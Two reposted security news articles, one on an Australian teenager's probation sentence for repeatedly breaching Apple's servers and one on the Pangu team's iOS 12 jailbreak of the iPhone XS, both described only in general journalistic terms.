An Australian teenager who pleaded guilty to breaking into Apple's private systems multiple times over several months and downloading some 90GB of secure files has avoided conviction and will not serve time in prison.

An Australian Children's Court has given the now 19-year-old adult defendant, who was 16 at the time of committing the crime, a probation order of eight months, though the magistrate made him understand how serious his offense was.

The teen, who cannot be named under a local law that protects the identity of juveniles, told the court that he hacked into Apple's systems because he was a huge fan of the company and "dreamed of" working for the technology giant.

The "Hacky Hack Hack" Folder

The teen hacked into Apple's servers not once, but numerous times over the course of more than a year—between June 2015 and November 2016, and in April 2017.

As soon as the tech giant detected his presence on their servers, it blocked him and contacted the Federal Bureau of Investigation (FBI), which took the help of the Australian Federal Police (AFP), who subsequently raided his home last year and arrested him.

The AFP also seized two Apple laptops, a mobile phone, and a hard drive that contained a folder named "Hacky Hack Hack Methods Exclude," including 12 files on methods to infiltrate and bypass Apple's security.

Australian investigators recovered 90GB of data he had copied from Apple's systems, data "sensitive both from a privacy and commercial point of view," including highly sensitive authorized keys used to grant users login access and to access multiple user accounts.

Here's How The Boy Hacked Into Apple's Servers

According to the magistrate, as reported by Bloomberg, the teenager used a virtual private network (VPN) to connect remotely to Apple's internal systems.

With the help of his friend, the teenager then sent a malicious script to the system that created a secure shell tunnel, which allowed him to access systems and bypass firewalls and eventually enabled them to download data.

Apple reportedly detected the intrusion and blocked his access in November 2016, but the teenager regained access last year in April.

The teen pleaded guilty to two charges in August this year, but no conviction was recorded against him, because the magistrate told the court that he had shown remorse and had cooperated with law enforcement.

Instead of jail time, the defendant was given eight months' probation.

"Your offending is serious," the magistrate told the teenager. "It was sustained, sophisticated, and a successful attack on the security of a major multinational corporation."

Apple assured its customers that no personal data was compromised in the hack.

The young hacker has since been accepted into university to study criminology and cyber safety.

The prosecutor says the investigation into the case is still ongoing and could result in other people being charged, including a second teenager who helped him commit the crime.



from The Hacker News https://ift.tt/2IoIkdq

Port of San Diego suffers cyber-attack, second port in a week after Barcelona

Google launches VirusTotal Enterprise

Pangu Hackers have Jailbroken iOS 12 on Apple's New iPhone XS


Bad news for Apple.

The Chinese hacking team Pangu is back and has once again surprised everyone with a jailbreak for iOS 12 running on the brand-new iPhone XS.

Well, that was really fast.

The Pangu jailbreak team has been quiet for a while, since it last released the untethered jailbreak tool for iOS 9 back in October 2015.

Jailbreaking is a process of removing limitations on Apple's iOS devices so users can install third-party software not certified by Apple.

Today, Android and iOS security researcher Min (Spark) Zheng shared a tweet with two screenshots showing a working jailbreak on Apple's newly released iPhone XS with the A12 Bionic chip, achieved by one of the Pangu researchers.

The tweet also revealed that the iOS 12 jailbreak works by bypassing the functional PAC (pointer authentication codes) mitigation implemented in Apple's new A12 Bionic chip.

Moreover, since the hardware of the iPhone XS is nearly identical to that of the iPhone XS Max, the new iOS 12 jailbreak exploit should work on both of Apple's latest flagship iPhones.

Since the Pangu jailbreak team has not made any official announcement regarding the new jailbreak, it is not clear whether or not the team will release the iOS 12 jailbreak to the public.

Also, before jailbreaking your Apple devices, keep in mind that doing so violates your End User License Agreement with Apple and exposes your iOS device to security bugs, putting your personal data at risk; Apple will not help you if anything goes wrong.

Jailbreaking your iPhone also opens up your device to iOS malware such as KeyRaider and YiSpecter, which specifically targeted iOS users with jailbroken devices.

So, how are you feeling right now about the new jailbreaking? Let us know in the comments below.



from The Hacker News https://ift.tt/2R4qC2r